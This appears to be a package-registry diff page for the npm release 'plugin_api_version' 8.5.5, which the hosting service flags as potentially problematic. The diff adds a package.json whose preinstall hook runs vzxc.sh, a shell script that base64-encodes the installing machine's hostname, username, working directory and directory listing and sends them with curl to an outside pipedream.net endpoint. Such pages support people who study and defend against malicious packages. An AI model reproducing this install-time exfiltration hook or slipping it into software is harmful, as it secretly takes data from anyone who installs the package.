plugin_api_version 8.5.5

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of plugin_api_version might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/package.json +12 -0
  2. package/vzxc.sh +3 -0
package/package.json ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "plugin_api_version",
3
+ "version": "8.5.5",
4
+ "description": "PluginVersa",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall": "./vzxc.sh"
9
+ },
10
+ "author": "",
11
+ "license": "ISC"
12
+ }
package/vzxc.sh ADDED
@@ -0,0 +1,3 @@
1
+ #!/bin/bash
2
+
3
+ curl -H "HostN: $(hostname | base64)" -H "WhoAMI: $(whoami | base64)" -H "PwD: $(pwd | base64)" -d $(ls -la | base64) http://eouigiabists9v5.m.pipedream.net